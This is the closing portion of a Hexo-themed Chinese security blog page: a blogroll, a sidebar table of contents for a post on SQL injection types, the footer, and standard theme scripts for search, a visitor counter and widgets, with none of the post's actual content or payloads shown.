              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hoime.cn" title="French" target="_blank">French</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.tateliao.me" title="吃馒头的猫" target="_blank">吃馒头的猫</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/smelond" title="博客园" target="_blank">博客园</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#数字型"><span class="nav-number">1.</span> <span class="nav-text">数字型</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#数字型简单的判断是否有注入"><span class="nav-number">1.1.</span> <span class="nav-text">数字型简单的判断是否有注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#字符串型"><span class="nav-number">2.</span> <span class="nav-text">字符串型</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#如何判断字符串型是否有注入"><span class="nav-number">2.1.</span> <span class="nav-text">如何判断字符串型是否有注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#如何注入"><span class="nav-number">2.1.1.</span> <span class="nav-text">如何注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#如何突破"><span class="nav-number">2.2.</span> <span class="nav-text">如何突破</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#使用一些常用的关键字"><span class="nav-number">2.3.</span> <span class="nav-text">使用一些常用的关键字</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#搜索型"><span class="nav-number">3.</span> <span class="nav-text">搜索型</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#如何突破-1"><span class="nav-number">3.1.</span> <span class="nav-text">如何突破</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#构造其他的语句："><span class="nav-number">3.2.</span> <span class="nav-text">构造其他的语句：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#提交注入"><span class="nav-number">4.</span> <span class="nav-text">提交注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#这两种请求有什么区别？"><span class="nav-number">4.1.</span> <span class="nav-text">这两种请求有什么区别？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#post提交注入"><span class="nav-number">4.2.</span> <span class="nav-text">post提交注入</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script type="text/javascript" src="/js/src/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2017 -<!--&mdash;--> <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <!--<i class="fa fa-user"></i>-->
	<i class="fa fa-heart" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">smelond</span>

  
</div>


<!--
  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>


<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共字</span>
</div>


  <span class="post-meta-divider">|</span>
-->

<span id="busuanzi_container_site_pv">
    本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
<!--
  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>
-->



        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("MUl4Q9Que76AMXdf28xsNnU0-gzGzoHsz", "BCUNcAcSudJiHptnu7l55oQw");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?c23ef4e5a9bf75e0a9e008154c1ecf90"></script><script>L2Dwidget.init({});</script></body>
</html>


<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>